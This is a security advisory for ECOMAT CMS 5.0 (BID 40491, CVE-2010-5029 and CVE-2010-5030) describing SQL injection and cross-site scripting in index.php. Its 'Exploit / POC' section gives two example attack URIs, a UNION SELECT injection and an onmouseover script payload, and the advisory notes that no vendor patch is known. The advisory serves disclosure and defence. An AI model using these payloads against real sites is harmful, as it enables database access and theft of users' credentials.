ECOMAT 'index.php' SQL Injection and Cross Site Scripting Vulnerabilities
BID:40491
Info
ECOMAT 'index.php' SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 40491 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-5029 CVE-2010-5030 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 01 2010 12:00AM |
| Updated: | Nov 04 2011 05:23PM |
| Credit: | High-Tech Bridge SA |
| Vulnerable: |
codefabrik ECOMAT 5.0 |
| Not Vulnerable: | |
Discussion
ECOMAT 'index.php' SQL Injection and Cross Site Scripting Vulnerabilities
ECOMAT is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ECOMAT 5.0 is vulnerable; other versions may be affected.
ECOMAT is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ECOMAT 5.0 is vulnerable; other versions may be affected.
Exploit / POC
ECOMAT 'index.php' SQL Injection and Cross Site Scripting Vulnerabilities
The following example URIs are available:
http://www.example.com/index.php?type=web&lang=de&show=-1+union+select+user%28%29+--+&mhs=0
http://www.example.com/index.php?type=web&lang=xx%22+onmouseover=alert%28123%29+style=position:absolute;left:0;top:0;width:100%;height:100%+&show=25&mhs=0
The following example URIs are available:
http://www.example.com/index.php?type=web&lang=de&show=-1+union+select+user%28%29+--+&mhs=0
http://www.example.com/index.php?type=web&lang=xx%22+onmouseover=alert%28123%29+style=position:absolute;left:0;top:0;width:100%;height:100%+&show=25&mhs=0
Solution / Fix
ECOMAT 'index.php' SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ECOMAT 'index.php' SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- ECOMAT CMS - Homepage (codefabrik)
- SQL injection vulnerability in Ecomat CMS (High-Tech Bridge SA)
- XSS vulnerability in Ecomat CMS (High-Tech Bridge SA)
- XSS vulnerability in Ecomat CMS ([email protected])
- SQL injection vulnerability in Ecomat CMS ([email protected])